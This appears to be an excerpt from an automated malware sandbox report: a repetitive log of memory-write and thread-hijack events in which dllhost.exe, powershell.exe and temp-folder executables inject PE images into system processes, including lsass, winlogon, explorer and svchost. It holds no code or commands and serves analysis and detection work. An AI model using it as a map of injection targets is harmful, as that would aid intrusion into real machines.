        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 280C22F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1FB970000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 25EE91B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1AD31C90000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226AD1B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 138D43C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 236C6DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: CD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 15829E70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D643A60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20631820000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1CCE3640000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1858EA10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2942EBE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23D96450000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C8A0380000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 26D9F390000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E5EF030000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 248D2920000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 21C0EE50000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 165EDA50000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140000000 value: 4D
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140001000 value: 48
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140367000 value: 1E
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 1404A0000 value: F0
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140753000 value: 00
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140775000 value: 48
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140776000 value: C5
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140777000 value: 48
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140779000 value: 48
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 14077B000 value: 60
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 14077C000 value: 00
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 14077D000 value: 00
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 81E010 value: 00
        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 3968 base: 29E0000 value: 4D
        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1528 base: CD0000 value: 4D
        Source: C:\Windows\System32\conhost.exeThread register set: target process: 1528
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1528
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4672
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7560
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5880
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7528
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4912
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 1528 1
        Source: C:\Users\user\AppData\Local\Temp\paint.exeMemory written: C:\Windows\System32\conhost.exe base: 113DAF00000
        Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 12BE3BE0000
        Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 21E7B340000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 81E010
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 236ACAA0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 780000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 800000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3B0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 231A3A3010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: B712225010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: E7A5297010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 79686B5010
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC60380000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 161C7340000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 233B91B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 210918F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2062E960000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282B8D70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22856DC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207BAC00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27A01800000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2992B230000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23227590000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28098F60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23ACD780000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1C1330000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192A4090000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5112C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2848B1D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A12F60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8115C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C8B4690000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 213C6680000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: B80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25B905C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2905A8E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5FA180000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19296180000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24ED0B70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20955300000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B054660000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15D00D80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20983090000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 278CACC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAE2270000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 284FF340000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22687920000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B661F20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD637D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 29E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2081CC80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23263180000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2064B670000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F535400000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 149A8F80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A0126F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 251F17A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
